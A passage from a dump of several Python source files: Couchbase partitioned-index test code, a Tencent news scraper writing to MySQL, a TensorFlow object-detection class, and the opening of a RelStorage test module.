index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
try:
# Restore backup
# Stop couchbase on indexer node before restoring backup if test config specifies it
remote = RemoteMachineShellConnection(node_out)
remote.stop_couchbase()
self.sleep(30, "Allow node to be marked as a failed node")
self._create_restore(kv_node)
except Exception as ex:
self.log.info(str(ex))
finally:
remote = RemoteMachineShellConnection(node_out)
remote.start_couchbase()
def test_backup_restore_partitioned_index_default_num_partitions(self):
self._load_emp_dataset(end=self.num_items)
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_detail["num_partitions_post_restore"] = 8
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_detail["num_partitions_post_restore"] = 64
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
# Set default number of partitions
self.rest.set_index_settings(
{"indexer.numPartitions": 4})
# Change expected num of partitions
for index in index_details:
index["num_partitions"] = index["num_partitions_post_restore"]
# Restore backup
self._create_restore(kv_node)
self.sleep(60)
# Validate all indexes restored correctly
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
# After restore, all indexes are going to be in unbuilt. So change the expected state of indexes.
for index in index_details:
index["defer_build"] = True
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
def get_stats_for_partitioned_indexes(self, bucket_name="default",
index_name=None, node_list=None):
if node_list is None:
node_list = self.node_list
bucket_item_count = self.get_item_count(self.servers[0], bucket_name)
index_stats = self.get_index_stats(perNode=True)
total_item_count = 0
total_items_processed = 0
for node in node_list:
if not index_name:
index_names = []
for key in index_stats[node][bucket_name]:
index_names.append(key)
index_name = index_names[0]
try:
total_item_count += index_stats[node][bucket_name][index_name][
"items_count"]
total_items_processed = \
index_stats[node][bucket_name][index_name][
"num_docs_processed"]
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Index {0} : Total Item Count={1} Total Items Processed={2}".format(
index_name, str(total_item_count), str(total_items_processed)))
return (bucket_item_count, total_item_count, total_items_processed)
# Description : Validate index metadata : num_partitions, index status, index existence
def validate_partitioned_indexes(self, index_details, index_map,
index_metadata, skip_numpartitions_check=False):
isIndexPresent = False
isNumPartitionsCorrect = False
isDeferBuildCorrect = False
# Check if index exists
for index in index_metadata["status"]:
if index["name"] == index_details["index_name"]:
isIndexPresent = True
# If num-partitions are set, check no. of partitions
expected_num_partitions = 16
if index_details["num_partitions"] > 0:
expected_num_partitions = index_details["num_partitions"]
if index["partitioned"] and index[
"numPartition"] == expected_num_partitions:
isNumPartitionsCorrect = True
else:
self.log.info(
"Index {0} on /getIndexStatus : Partitioned={1}, num_partition={2}.. Expected numPartitions={3}".format(
index["name"], index["partitioned"],
index["numPartition"],
index_details["num_partitions"]))
if index_details["defer_build"] == True and index[
"status"] == "Created":
isDeferBuildCorrect = True
elif index_details["defer_build"] == False and index[
"status"] == "Ready":
isDeferBuildCorrect = True
else:
self.log.info(
"Incorrect build status for index created with defer_build=True. Status for {0} is {1}".format(
index["name"], index["status"]))
if not isIndexPresent:
self.log.info("Index not listed in /getIndexStatus")
if skip_numpartitions_check:
return isIndexPresent and isDeferBuildCorrect
else:
return isIndexPresent and isNumPartitionsCorrect and isDeferBuildCorrect
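# Illustrative sketch (added for clarity, not used by the tests): the shape of the
# indexer metadata these validators rely on, inferred from the fields accessed in
# this file. Real /getIndexStatus responses carry additional fields not shown here,
# and the values below are made-up examples.
#
#   index_metadata = {
#       "status": [
#           {"name": "idx1",
#            "partitioned": True,
#            "numPartition": 8,
#            "status": "Ready",          # "Created" for defer_build indexes
#            "hosts": ["172.16.1.1:8091"],
#            "partitionMap": {"172.16.1.1:8091": [1, 2, 3, 4, 5, 6, 7, 8]}}
#       ]
#   }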
# Description : Checks whether the same host contains duplicate partitions across replicas, and whether each replica's partitions are distributed across the nodes
def validate_partition_map(self, index_metadata, index_name, num_replica, num_partitions,dropped_replica=False, replicaId=0):
index_names = []
index_names.append(index_name)
hosts = []
# hosts = index_metadata["status"][0]["hosts"]
for index in index_metadata['status']:
for host in index['hosts']:
if host not in hosts:
hosts.append(host)
for i in range(1, num_replica + 1):
if dropped_replica:
if not i == replicaId:
index_names.append(index_name + " (replica {0})".format(str(i)))
else:
dropped_replica_name = index_name + " (replica {0})".format(str(i))
else:
index_names.append(index_name + " (replica {0})".format(str(i)))
partition_validation_per_host = True
for host in hosts:
pmap_host = []
for idx_name in index_names:
for index in index_metadata["status"]:
if (index["name"] == idx_name) and (host in index["hosts"]):
pmap_host += index["partitionMap"][host]
self.log.info(
"List of partitions on {0} : {1}".format(host, pmap_host))
if len(set(pmap_host)) != len(pmap_host):
partition_validation_per_host &= False
self.log.info(
"Partitions on {0} for all replicas are not correct, host contains duplicate partitions".format(host))
partitions_distributed_for_index = True
for idx_name in index_names:
for index in index_metadata["status"]:
if index["name"] == idx_name:
totalPartitions = 0
for host in hosts:
if host in index["partitionMap"]:
totalPartitions += len(index["partitionMap"][host])
partitions_distributed_for_index &= (
totalPartitions == num_partitions)
if dropped_replica:
if index['name'] == dropped_replica_name:
partitions_distributed_for_index = False
return partition_validation_per_host & partitions_distributed_for_index
def validate_partition_distribution_after_cluster_ops(self, index_name,
map_before_rebalance,
map_after_rebalance,
nodes_in, nodes_out):
# Check for number of partitions before and after rebalance
# Check the host list before rebalance and after rebalance, and see if the incoming or outgoing node is added/removed from the host list
# Check for partition distribution across all indexer nodes
for index in map_before_rebalance["status"]:
if index["name"] == index_name:
host_list_before = index["hosts"]
num_partitions_before = index["numPartition"]
partition_map_before = index["partitionMap"]
for index in map_after_rebalance["status"]:
if index["name"] == index_name:
host_list_after = index["hosts"]
num_partitions_after = index["numPartition"]
partition_map_after = index["partitionMap"]
is_num_partitions_equal = False
if num_partitions_before == num_partitions_after:
is_num_partitions_equal = True
else:
self.log.info(
"Number of partitions before and after cluster operations is not equal. Some partitions missing/extra.")
self.log.info(
"Num Partitions Before : {0}, Num Partitions After : {1}".format(
num_partitions_before, num_partitions_after))
expected_host_list_after = copy.deepcopy(host_list_before)
for node in nodes_in:
node_str = node.ip + ":" + str(node.port)
expected_host_list_after.append(node_str)
for node in nodes_out:
node_str = node.ip + ":" + str(node.port)
if node_str in expected_host_list_after:
expected_host_list_after.remove(node_str)
is_node_list_correct = False
if sorted(expected_host_list_after) == sorted(host_list_after):
is_node_list_correct = True
else:
self.log.info(
"Host list for index is not expected after cluster operations.")
self.log.info("Expected Nodes : {0}, Actual nodes : {1}",
format(str(expected_host_list_after),
str(host_list_after)))
is_partitions_distributed = False
pmap_host_list = list(partition_map_after.keys())
if sorted(pmap_host_list) == sorted(host_list_after):
is_partitions_distributed = True
else:
self.log.info(
"Partitions not distributed correctly post cluster ops")
return is_num_partitions_equal & is_node_list_correct & is_partitions_distributed
def get_num_partitions_for_index(self, index_map, index_name):
num_partitions = 0
for index_map_item in index_map["status"]:
if index_map_item["name"] == index_name:
num_partitions = index_map_item["numPartition"]
if num_partitions == 0:
self.log.info("Index not found, or some other issue")
else:
return num_partitions
# Description : Returns a list of create index statements generated randomly for emp dataset.
# The create index statements are generated by randomizing various parts of the statements like list of
# index keys, partition keys, primary/secondary indexes, deferred index, partial index, replica index, etc.
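# Illustrative example (not produced verbatim by any single run) of the kind of
# statement this generator can emit; the index name, field list and WITH options
# are all randomised:
#
#   CREATE INDEX idx42137 on default(name,salary,is_manager)
#   partition by hash(name,(salary % 10) + (salary * 2) )
#   with {'num_partition':12,'num_replica':1,'defer_build':true}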
def generate_random_create_index_statements(self, bucketname="default",
idx_node_list=None,
num_statements=1):
num_idx_nodes = len(idx_node_list)
emp_fields = {
'text': ["name", "dept", "languages_known", "email", "meta().id"],
'number': ["mutated", "salary"],
'boolean': ["is_manager"],
'datetime': ["join_date"],
'object': ["manages"] # denote nested fields
}
emp_nested_fields = {
'manages': {
'text': ["reports"],
'number': ["team_size"]
}
}
index_variations_list = ["num_partitions", "num_replica", "defer_build",
"partial_index", "primary_index", "nodes",
"sizing_estimates"]
all_emp_fields = ["name", "dept", "languages_known", "email", "mutated",
"salary", "is_manager", "join_date", "reports",
"team_size"]
partition_key_type_list = ["leading_key", "trailing_key",
"function_applied_key",
"document_id", "function_applied_doc_id"]
index_details = []
for i in range(num_statements):
random.seed()
# 1. Generate a random no. of fields to be indexed
num_index_keys = random.randint(1, len(all_emp_fields) - 1)
# 2. Generate random fields
index_fields = []
for index in range(0, num_index_keys):
index_field_list_idx = random.randint(0, len(
all_emp_fields) - 1)
if all_emp_fields[
index_field_list_idx] not in index_fields:
index_fields.append(
all_emp_fields[index_field_list_idx])
else:
# Generate a random index again
index_field_list_idx = random.randint(0,
len(
all_emp_fields) - 1)
if all_emp_fields[
index_field_list_idx] not in index_fields:
index_fields.append(
all_emp_fields[index_field_list_idx])
# 3. Generate a random no. for no. of partition keys (this should be < #1)
if num_index_keys > 1:
num_partition_keys = random.randint(1, num_index_keys - 1)
else:
num_partition_keys = num_index_keys
# 4. For each partition key, randomly select a partition key type from the list and generate a partition key with it
partition_keys = []
for index in range(num_partition_keys):
key = None
partition_key_type = partition_key_type_list[
random.randint(0, len(partition_key_type_list) - 1)]
if partition_key_type == partition_key_type_list[0]:
key = index_fields[0]
if partition_key_type == partition_key_type_list[1]:
if len(index_fields) > 1:
randval = random.randint(1, len(index_fields)-1)
key = index_fields[randval]
else:
key = index_fields[0]
if partition_key_type == partition_key_type_list[2]:
idx_key = index_fields[
random.randint(0, len(index_fields) - 1)]
if idx_key in emp_fields["text"]:
key = ("LOWER({0})".format(idx_key))
elif idx_key in emp_fields["number"]:
key = ("({0} % 10) + ({0} * 2) ").format(idx_key)
elif idx_key in emp_fields["boolean"]:
key = ("NOT {0}".format(idx_key))
elif idx_key in emp_fields["datetime"]:
key = ("DATE_ADD_STR({0},-1,'year')".format(idx_key))
elif idx_key in emp_nested_fields["manages"]["text"]:
key = ("LOWER({0})".format(idx_key))
elif idx_key in emp_nested_fields["manages"]["number"]:
key = ("({0} % 10) + ({0} * 2)").format(idx_key)
if partition_key_type == partition_key_type_list[3]:
key = "meta().id"
if partition_key_type == partition_key_type_list[4]:
key = "SUBSTR(meta().id, POSITION(meta().id, '__')+2)"
if ((key is not None) and (key != "")) and (key not in partition_keys):
partition_keys.append(key)
self.log.info("Partition Keys : {0}, Partition Key Type : {1}".format(key, partition_key_type))
# 6. Choose other variations for the query from the list.
num_index_variations = random.randint(0, len(
index_variations_list) - 1)
index_variations = []
for index in range(num_index_variations):
index_variation = index_variations_list[
random.randint(0, len(index_variations_list) - 1)]
if index_variation not in index_variations:
index_variations.append(index_variation)
# Primary indexes cannot be partial, so remove partial index if primary index is in the list
if ("primary_index" in index_variations) and (
"partial_index" in index_variations):
index_variations.remove("partial_index")
# 7. Build create index queries.
index_name = "idx" + str(random.randint(0, 1000000))
if "primary_index" in index_variations:
create_index_statement = "CREATE PRIMARY INDEX {0} on {1}".format(
index_name, bucketname)
else:
create_index_statement = "CREATE INDEX {0} on {1}(".format(
index_name, bucketname)
create_index_statement += ",".join(index_fields) + ")"
create_index_statement += " partition by hash("
create_index_statement += ",".join(partition_keys) + ")"
if "partial_index" in index_variations:
create_index_statement += " where meta().id > 10"
with_list = ["num_partitions", "num_replica", "defer_build",
"nodes", "sizing_estimates"]
num_partitions = 0
num_replica = 0
defer_build = False
nodes = []
if (any(x in index_variations for x in with_list)):
with_statement = []
create_index_statement += " with {"
if "num_partitions" in index_variations:
if self.gsi_type == "memory_optimized":
num_partitions = random.randint(4, 20)
else:
num_partitions = random.randint(4, 100)
with_statement.append(
"'num_partition':{0}".format(num_partitions))
if "num_replica" in index_variations:
# We do not want 'num_replica' and 'nodes' both in the with clause, as it can cause errors if they do not match.
if "nodes" in index_variations:
index_variations.remove("nodes")
num_replica = random.randint(1, num_idx_nodes - 1)
with_statement.append(
"'num_replica':{0}".format(num_replica))
if "defer_build" in index_variations:
defer_build = True
with_statement.append("'defer_build':true")
if "sizing_estimates" in index_variations:
with_statement.append("'secKeySize':20")
with_statement.append("'docKeySize':20")
with_statement.append("'arrSize':10")
if "nodes" in index_variations:
num_nodes = random.randint(1, num_idx_nodes - 1)
for i in range(0, num_nodes):
node = idx_node_list[
random.randint(0, num_idx_nodes - 1)]
if node not in nodes:
nodes.append(node)
node_list_str = ""
if nodes is not None and len(nodes) > 1:
node_list_str = "\"" + "\",\"".join(nodes) + "\""
else:
node_list_str = "\"" + nodes[0] + "\""
with_statement.append("'nodes':[{0}]".format(node_list_str))
create_index_statement += ",".join(with_statement) + "}"
index_detail = {}
index_detail["index_name"] = index_name
if num_partitions == 0:
num_partitions = 8
index_detail["num_partitions"] = num_partitions
index_detail["num_replica"] = num_replica
index_detail["defer_build"] = defer_build
index_detail["index_definition"] = create_index_statement
index_detail["nodes"] = nodes
if key is not None and key != "":
index_details.append(index_detail)
else:
self.log.info(
"Generated a malformed index definition. Discarding it.")
return index_details
def validate_query_plan(self, plan, index_name, num_spans=0, limit=0,
offset=0, projection_list=[], index_order_list=[]):
span_pushdown = False
limit_pushdown = False
offset_pushdown = False
projection_pushdown = False
sorting_pushdown = False
index_section_found = False
plan_index_section = {}
for plan_child in plan["~children"]:
if "index" in plan_child:
index_section_found = True
plan_index_section = plan_child
break
for plan_child in plan["~children"]:
if not index_section_found:
for plan_child_child in plan_child["~children"]:
if "index" in plan_child_child:
index_section_found = True
plan_index_section = plan_child_child
break
else:
break
if index_section_found:
if plan_index_section["index"] == index_name:
if num_spans > 0:
if "spans" in plan_index_section:
if len(plan_index_section["spans"][0][
"range"]) != num_spans:
self.log.info(
"Looks like all spans not pushed down to indexer. Spans pushed down to indexer = %s",
len(plan_index_section["spans"]["range"]))
else:
self.log.info(
"All spans pushed down to indexer")
span_pushdown = True
else:
self.log.info("Spans not pushed down to indexer")
if limit > 0:
if "limit" in plan_index_section:
if int(plan_index_section["limit"]) != limit:
self.log.info(
"Limit not correctly pushed down to indexer")
else:
self.log.info(
"Limit pushed down to indexer")
limit_pushdown = True
else:
self.log.info("Limit not pushed down to indexer")
if offset > 0:
if "offset" in plan_index_section:
if int(plan_index_section["offset"]) != offset:
self.log.info(
"Offset not correctly pushed down to indexer")
else:
self.log.info(
"Offset pushed down to indexer")
offset_pushdown = True
else:
self.log.info("Offset not pushed down to indexer")
if projection_list:
if "index_projection" in plan_index_section:
if plan_index_section["index_projection"][
"entry_keys"] != projection_list:
self.log.info(
"Projection not correctly pushed down to indexer")
else:
self.log.info(
"Projection pushed down to indexer")
projection_pushdown = True
if index_order_list:
if "index_order" in plan_index_section:
if plan_index_section[
"index_order"] != index_order_list:
self.log.info(
"Sorting not correctly pushed down to indexer")
else:
self.log.info(
"Sorting pushed down to indexer")
sorting_pushdown = True
return span_pushdown, limit_pushdown, offset_pushdown, projection_pushdown, sorting_pushdown
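# Illustrative sketch (assumed shape, not an exhaustive plan) of the explain-plan
# fragment validate_query_plan() inspects; only the keys read above are shown:
#
#   plan = {
#       "~children": [
#           {"index": "idx1",
#            "spans": [{"range": [ ... ]}],
#            "limit": "10",
#            "offset": "5",
#            "index_projection": {"entry_keys": [0, 1]},
#            "index_order": [ ... ]}
#       ]
#   }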
def _load_emp_dataset(self, op_type="create", expiration=0, start=0,
end=1000):
# Load Emp Dataset
self.cluster.bucket_flush(self.master)
if end > 0:
self._kv_gen = JsonDocGenerator("emp_",
encoding="utf-8",
start=start,
end=end)
gen = copy.deepcopy(self._kv_gen)
self._load_bucket(self.buckets[0], self.servers[0], gen, op_type,
expiration)
def _run_queries(self, query, count=10):
for i in range(0, count):
try:
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query failed")
self.sleep(1)
def _saturate_indexer_memory(self, index_server=None):
cnt = 0
step = 100000
docs = 100000
while cnt < 50:
if self.gsi_type == "memory_optimized":
if self._validate_indexer_status_oom(index_server):
self.log.info("OOM on index server is achieved")
return True
elif self.gsi_type == "plasma":
if self._validate_indexer_in_dgm(index_server):
self.log.info("DGM on index server is achieved")
return True
for task in self.kv_mutations(docs, start=docs - step):
task.result()
self.sleep(5)
cnt += 1
docs += step
return False
def _validate_indexer_status_oom(self, index_server=None):
if not index_server:
index_server = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=False)
rest = RestConnection(index_server)
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
if index_stats["indexer_state"].lower() == "paused":
return True
else:
return False
def _validate_indexer_in_dgm(self, index_server=None):
indexer_rest = RestConnection(index_server)
content = indexer_rest.get_index_storage_stats()
for index in list(content.values()):
for stats in list(index.values()):
if stats["MainStore"]["resident_ratio"] >= 1.00:
return False
return True
def kv_mutations(self, docs=1, start=0):
self.log.info("Inside kv_mutations")
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs, start=start)
self.full_docs_list = self.generate_full_docs_list(gens_load)
self.gen_results = TuqGenerators(self.log, self.full_docs_list)
tasks = self.async_load(generators_load=gens_load, op_type="create",
batch_size=1000)
return tasks
|
pa_tengxunxinwen.py
|
import re
import json
import gevent
import random
import pymysql
import requests
import threading
from queue import Queue
def conn_mysql():
conn = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='123456',
db='spiderwork')
cursor = conn.cursor()
return conn, cursor
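# Hedged helper (not part of the original script): the INSERT in worker() assumes a
# `tengxunew` table already exists in the `spiderwork` database. The column types
# below are assumptions chosen to fit the values being inserted; adjust as needed.
def ensure_table(cursor):
    cursor.execute(
        "CREATE TABLE IF NOT EXISTS tengxunew ("
        " id INT AUTO_INCREMENT PRIMARY KEY,"
        " title VARCHAR(255),"
        " source VARCHAR(64),"
        " url VARCHAR(512),"
        " release_time VARCHAR(64),"
        " content TEXT,"
        " engineer VARCHAR(32))"
    )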
def random_str():
string = 'abcdefghijklmnopqrstuvwxyz'
ret = ''
for i in range(15):
ret += random.choice(string)
return ret
def request_url(url):
agent = random_str()
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': agent,
}
response = requests.get(url,headers=headers)
ret = response.text
return ret
def worker(news):
news_info = {}
news_url = news['url']
news_source = news['source']
news_info['title'] = news['title']
news_info['source'] = news_source
news_info['url'] = news_url
news_ret = request_url(news_url)
pattern = re.compile(r'content: (\{.*?)id:', re.S)
news_str = pattern.findall(news_ret)[0].strip()
news_str = news_str.rsplit(',', 1)[0]
news_dict = json.loads(news_str)
news_content = news_dict['cnt_html']
news_content = re.sub(r'\<(.*?)\>', '', news_content)
news_content = news_content.rsplit('▌', 1)[0]
news_info['content'] = news_content
news_info['release_time'] = news_dict['alt_time']
news_info['engineer'] = 'fang'
print(news_info)
if lock.acquire():
sql = "insert into tengxunew(title, source, url, release_time, content, engineer) values(%s, %s, %s, %s, %s, %s)"
news_data = (news_info['title'], news_info['source'], news_info['url'], news_info['release_time'], news_info['content'], news_info['engineer'])
conn.ping(reconnect=True)
try:
cursor.execute(sql, news_data)
conn.commit()
except Exception as err_msg:
print(err_msg)
conn.rollback()
lock.release()
data[news_source].append(news_info)
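# Hedged illustration (not called anywhere): a toy input showing what the regex /
# rsplit pipeline in worker() expects from the article page. Real pages embed a
# larger object; only the two keys read above are shown, with made-up values.
def _demo_extract():
    sample = 'content: {"cnt_html": "<p>hello</p>", "alt_time": "2020-01-01 10:00"}, id: "123"'
    pattern = re.compile(r'content: (\{.*?)id:', re.S)
    news_str = pattern.findall(sample)[0].strip()
    news_str = news_str.rsplit(',', 1)[0]
    # -> {'cnt_html': '<p>hello</p>', 'alt_time': '2020-01-01 10:00'}
    return json.loads(news_str)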
def task(q):
while not q.empty():
url = q.get()
ret = request_url(url)
ret_dict = json.loads(ret)
if ret_dict['data']:
gevent_list = []
for news in ret_dict['data']:
g = gevent.spawn(worker, news)
gevent_list.append(g)
gevent.joinall(gevent_list)
def crawl():
q = Queue()
mid_dict = {
'央视新闻': 58,
'中国新闻网': 1124,
'中国周刊': 1156,
'央视网新闻': 5278151,
'人民网': 1456,
'新华社新闻': 10859191,
'北青Qnews': 16314728,
'环球网': 26082,
'新京报': 26134,
'观察者网': 5006122,
'第一财经': 5178949,
'北京青年报': 5081830,
'界面新闻': 5564731,
'21世纪经济报道': 1233,
'中国新闻周刊': 5069188,
'光明网': 5215397,
'正义网': 5029544,
'法制网': 5065699,
'中国证券报': 1368,
'证券时报网': 1755,
}
for key, mid in mid_dict.items():
data[key] = []
for page in range(10):
url = 'https://pacaio.match.qq.com/om/mediaArticles?mid={}&num=30&page={}'.format(mid, page)
q.put(url)
threading_list = []
for i in range(10):
t = threading.Thread(target=task, args=(q, ))
t.start()
threading_list.append(t)
for t in threading_list:
t.join()
# with open('tengxun.json', mode='w', encoding='utf-8') as fp:
# json.dump(data, fp, ensure_ascii=False, indent=4)
cursor.close()
conn.close()
if __name__ == '__main__':
data = {}
conn, cursor = conn_mysql()
lock = threading.Lock()
crawl()
|
tensorflow.py
|
# -*- coding: utf-8 -*-
try:
import tensorflow as tf
from object_detection.utils import label_map_util as lm_util
except ImportError as error:
raise ImportError(
"Usage of the TensorFlow detectors requires that TensorFlow and the TensorFlow Object "
"Detection API are installed. A quick guide on how to set these up can be found here: "
"https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html")\
from error
import threading
import numpy as np
from copy import copy
from pathlib import Path
from .base import Detector
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.array import StateVector
from ..types.detection import Detection
class TensorFlowBoxObjectDetector(Detector):
"""TensorFlowBoxObjectDetector
A box object detector that generates detections of objects in the form of bounding boxes
from image/video frames using a TensorFlow object detection model. Both TensorFlow 1 and
TensorFlow 2 compatible models are supported.
The detections generated by the box detector have the form of bounding boxes that capture
the area of the frame where an object is detected. Each bounding box is represented by a
vector of the form ``[x, y, w, h]``, where ``x, y`` denote the relative coordinates of the
top-left corner, while ``w, h`` denote the relative width and height of the bounding box.
Additionally, each detection carries the following meta-data fields:
- ``raw_box``: The raw bounding box, as generated by TensorFlow.
- ``class``: A dict with keys ``id`` and ``name`` relating to the id and name of the
detection class.
- ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence.
Important
---------
Use of this class requires that TensorFlow 2 and the TensorFlow Object Detection API are
installed. A quick guide on how to set these up can be found
`here <https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html>`_.
""" # noqa
model_path: Path = Property(
doc="Path to ``saved_model`` directory. This is the directory that contains the "
"``saved_model.pb`` file.")
labels_path: Path = Property(
doc="Path to label map (``*.pbtxt`` file). This is the file that contains mapping of "
"object/class ids to meaningful names")
run_async: bool = Property(
doc="If set to ``True``, the detector will digest frames from the reader asynchronously "
"and only perform detection on the last frame digested. This is suitable when the "
"detector is applied to readers generating a live feed (e.g. "
":class:`~.FFmpegVideoStreamReader`), where real-time processing is paramount. "
"Defaults to ``False``",
default=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load model
model = tf.saved_model.load(self.model_path)
tf_version = model.tensorflow_version
# Get detection function
if tf_version.startswith('1'):
self._detect_fn = model.signatures['serving_default']
else:
self._detect_fn = model
# Create category index
self.category_index = lm_util.create_category_index_from_labelmap(self.labels_path,
use_display_name=True)
# Variables used in async mode
if self.run_async:
self._buffer = None
# Initialise frame capture thread
self._capture_thread = threading.Thread(target=self._capture)
self._capture_thread.daemon = True
self._thread_lock = threading.Lock()
self._capture_thread.start()
@BufferedGenerator.generator_method
def detections_gen(self):
"""Returns a generator of detections for each frame.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.Detection`
Detections generated in the time step. The detection state vector is of the form
``(x, y, w, h)``, where ``x, y`` denote the relative coordinates of the top-left
corner of the bounding box containing the object, while ``w, h`` denote the relative
width and height of the bounding box. Additionally, each detection carries the
following meta-data fields:
- ``raw_box``: The raw bounding box, as generated by TensorFlow.
- ``class``: A dict with keys ``id`` and ``name`` relating to the \
id and name of the detection class, as specified by the label map.
- ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence
"""
if self.run_async:
yield from self._detections_gen_async()
else:
yield from self._detections_gen()
def _capture(self):
for timestamp, frame in self.sensor:
self._thread_lock.acquire()
self._buffer = frame
self._thread_lock.release()
def _detections_gen(self):
for timestamp, frame in self.sensor:
detections = self._get_detections_from_frame(frame)
yield timestamp, detections
def _detections_gen_async(self):
while self._capture_thread.is_alive():
if self._buffer is not None:
self._thread_lock.acquire()
frame = copy(self._buffer)
self._buffer = None
self._thread_lock.release()
detections = self._get_detections_from_frame(frame)
yield frame.timestamp, detections
def _get_detections_from_frame(self, frame):
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(frame.pixels)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Perform detection
output_dict = self._detect_fn(input_tensor)
# All outputs are batch tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
# Extract classes, boxes and scores
classes = output_dict['detection_classes'].astype(np.int64) # classes should be ints.
boxes = output_dict['detection_boxes']
scores = output_dict['detection_scores']
# Form detections
detections = set()
frame_height, frame_width, _ = frame.pixels.shape
for box, class_, score in zip(boxes, classes, scores):
metadata = {
"raw_box": box,
"class": self.category_index[class_],
"score": score
}
# Transform box from TensorFlow's normalized (ymin, xmin, ymax, xmax) format to (x, y, w, h)
state_vector = StateVector([box[1]*frame_width,
box[0]*frame_height,
(box[3] - box[1])*frame_width,
(box[2] - box[0])*frame_height])
detection = Detection(state_vector=state_vector,
timestamp=frame.timestamp,
metadata=metadata)
detections.add(detection)
return detections
|
reltestbase.py
|
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
